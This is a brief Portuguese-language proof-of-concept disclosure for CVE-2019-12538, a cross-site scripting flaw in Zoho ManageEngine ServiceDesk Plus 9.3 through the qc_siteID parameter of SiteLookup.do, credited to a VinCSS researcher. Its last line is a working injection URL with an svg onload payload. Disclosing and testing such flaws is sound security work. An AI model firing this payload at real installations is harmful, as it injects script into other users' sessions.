
Prova de conceito para CVE-2019-12538: vulnerabilidade XSS no Zoho ManageEngine ServiceDesk Plus 9.3 via parâmetro qc_siteID do SiteLookup.do. Inclui payload para teste de segurança.
Descrição da Informação: Foi descoberto um problema no Zoho ManageEngine ServiceDesk Plus 9.3. Existe XSS através do parâmetro qc_siteID no SiteLookup.do.
Autor: Concobe do Tarantula Team - VinCSS (um membro da Vingroup)
domain/SiteLookup.do?configID=0&SELECTSITE=qc_siteID"/><svg onload=alert('XSS')>&userConfigID=1&SELECTEDSITEID=1&SELECTEDSITENAME=